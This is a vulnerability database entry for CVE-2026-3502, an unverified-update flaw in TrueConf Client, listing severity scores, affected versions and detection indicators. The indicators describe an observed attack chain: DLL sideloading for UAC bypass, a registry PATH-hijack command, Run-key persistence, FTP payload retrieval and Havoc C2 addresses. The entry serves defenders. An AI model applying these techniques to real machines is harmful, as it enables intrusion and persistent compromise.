cvebase
CVE-2026-3502
published 2026-03-30

Priority: P1, 80, high
CVSS 3.1: 7.8 (AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L)
CISA Known Exploited Vulnerability (KEV), due 2026-04-16
Exploited in the wild (ITW)
EPSS: 5.75% (92.1th percentile)

TrueConf Client downloads application update code and applies it without performing verification. An attacker who is able to influence the update delivery path can substitute a tampered update payload. If the payload is executed or installed by the updater, this may result in arbitrary code execution in the context of the updating process or user.

Affected

2 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trueconf | trueconf | < 8.5.3.884 | 8.5.3.884 |
| trueconf | trueconf_client | | |

Detection & IOCs (extracted from sources)

  • Detect UAC bypass via iscsicpl.exe executing from SysWOW64 with iscsiexe.dll sideloaded from %PATH% (TEMP directory)
  • Alert on registry persistence key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to C:\ProgramData\PowerISO\PowerISO.exe
  • Detect PATH hijacking via registry: reg add hkcu\environment setting PATH to C:\users\<user>\appdata\local\temp, used to force sideloading of iscsiexe.dll
  • Monitor outbound FTP connections to 47.237.15[.]197 with credentials 'ftpuser' fetching update.7z, indicative of second-stage payload retrieval
  • Flag network traffic to Havoc C2 IPs 43.134.90[.]60, 43.134.52[.]221, and 47.237.15[.]197 (Alibaba Cloud / Tencent hosted)
  • Detect reconnaissance commands tasklist > cache and tracert 8.8.8.8 -h 5 executed in context of TrueConf update process
  • Hunt for rom.dat artifact dropped alongside iscsiexe.dll as an indicator of the Havoc loader stage
  • The vulnerability is only exploitable by an attacker who has already gained control of the on-premises TrueConf server; cloud-hosted deployments have a different trust boundary
  • The malicious update is delivered via the normal TrueConf update URL path; blocking or monitoring https://{trueconf_server}/downlods/trueconf_client.exe at the network level may help detect substitution
  • The update package on the server is stored at C:\Program Files\TrueConf Server\ClientInstFiles\; integrity monitoring of this directory is recommended to detect tampering

CVSS provenance

nvd: v3.1, 7.8 HIGH, CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
vulncheck: 7.8 HIGH
cisa: 7.8 HIGH